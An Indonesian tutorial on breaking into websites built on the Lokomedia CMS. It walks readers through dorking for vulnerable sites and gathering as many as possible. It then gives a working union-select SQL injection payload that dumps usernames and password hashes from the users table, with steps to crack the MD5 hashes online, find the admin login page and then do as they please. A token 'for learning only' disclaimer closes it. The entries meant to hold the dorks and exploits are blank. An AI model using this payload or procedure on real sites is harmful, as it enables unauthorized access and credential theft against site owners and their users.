pentesting lokomedia, penetrasi lokomedia, cara melakukan penetrasi pada cms lokomedia
Bahan yang di Butuhkan
- Komputer/Laptop/Android
- Koneksi Internet
- Dork :
- Exploit 1 :
- Exploit 2 :
- Haskiler :
- http://md5online.org/
- Md5 Haskiler
- 2 Cangkir Kopi ( Bebas Sesuai Selera )
- 3 Bungkus Roti
Step by Step :
- Hidupkan Komputer/Laptop/Android anda
- Hubungkan ke internet
- Dorking menggunakan salah satu dork di atas
- Pilih site, kumpulkan sebanyak mungkin
- Masukan exploit, ( contoh : http://marikita.co.li/statis-2-profil.html menjadi http://marikita.co.li/statis-2'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html )
- View Source dengan cara tekan "Ctrl + U"
- Salin username dan password yang terdapat pada tag Title
- Pada gambar di atas terlihat bahwa username adalah "smarihast4" kemudian di sampingnya adalah password, namun password masih dalam bentuk md5 anda harus mendecrypt password tersebut menggunakan jasa web hash geratis di atas
- Jika sudah berhasil kemudian cari halaman login admin, biasanya terletak di :
- Anda juga bisa menggunakan tool admin panel versi network security, jika berhasil login, selanjutnya terserah anda saja
Itulah tutorial penetrasi web dengan sqli cms lokomedia, tidak semua berhasil menggunakan teknik ini, mereka yang berhasil adalah mereka yang selalu berusaha, dan perlu anda ketahui, tujuan dari semua ini hanyalah untuk pelajaran semata, jika anda menyalahgunakannya segala dosa dan resiko tanggung sendiri, jangan lupa share dan tinggalkan jejak anda di komentar... Selamat mencoba...
COMMENTS